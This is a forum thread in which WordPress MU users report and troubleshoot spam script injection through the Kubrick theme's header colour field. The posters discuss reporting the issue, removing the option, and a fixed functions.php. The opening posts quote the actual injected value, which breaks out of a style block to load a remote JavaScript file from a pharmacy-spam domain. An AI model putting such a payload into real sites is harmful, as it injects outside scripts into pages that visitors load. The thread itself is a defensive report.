redbox
Member
Posted 17 years ago #
I clicked on a new blog on my site and was surprised to see the "requested account deleted" message as if it had been deleted or marked as spam. The background was black and the text was red. I checked the account and it was neither deleted or marked as spam. I viewed the page source and could see the regular page text which included a lot of keywords for prescriptions, though no links. I finally figured out that they were using Kubrick and entered a javascript link in the kubrick header selector
header-img.php?upper=\"}--></style><script src=http://1.onlinesearch4meds.com/ap/levitra.js></script><style>&lower=4180b6
I would imagine something like this could cause some damage. Is there a way to prevent it?
Best bet would be to probably submit an email to security ( at ) wordpress ( dot ) org as Kubrick is a theme that they keep an eye on.
I'm lost though. Where exactly in Kubrick was it put in? Into header.php or something on the user side?
redbox
Member
Posted 17 years ago #
It was entered where you customize the Kubrick header color from the users admin panel. Go to Presentation... Customize Header... then click Advanced.
They deleted the color hex code and entered \"}--></style><script src=http://1.onlinesearch4meds.com/ap/levitra.js></script><style> in that field to result in the code I posted above.
email security asap and mention it's showing up on the WPMu version of Kubrick. Sounds like the code is not going through the special characters and kses functions. It's got to be an oversight.
redbox
Member
Posted 17 years ago #
Thanks. I emailed and they sent me an updated file to try, but it didn't filter out the code. Hopefully someone will be able to correct it.
Thanks :)
lunabyte
Member
Posted 17 years ago #
For now, it seems like the most simple fix would be to use another theme as the default, and turn off themes with the same header feature.
Copy the text from the url below, rename it functions.php and upload it to /public_html/wp-content/themes/default/
It'll remove entirely the option, however it won't fix any existing breaches.... if someone can provide instructions on that that'd be great.
Here's the file: http://incsub.org/functions.txt
I don't believe any themes that I've worked with have the same feature... anyone got any examples.
Update: Site Admin > Blogs > Edut Blog (will most likely be your bottom option) and delete the Kubrik header image code should sort out idividual blogs.
i think k2 also does this.
I was able to reproduce this in the "Home" theme but after copying over files from the default theme the problem was fixed. See http://trac.mu.wordpress.org/changeset/977 for the fixed version of functions.php
Thanks Donncha.
So when do we get to see some more pictures of Adam?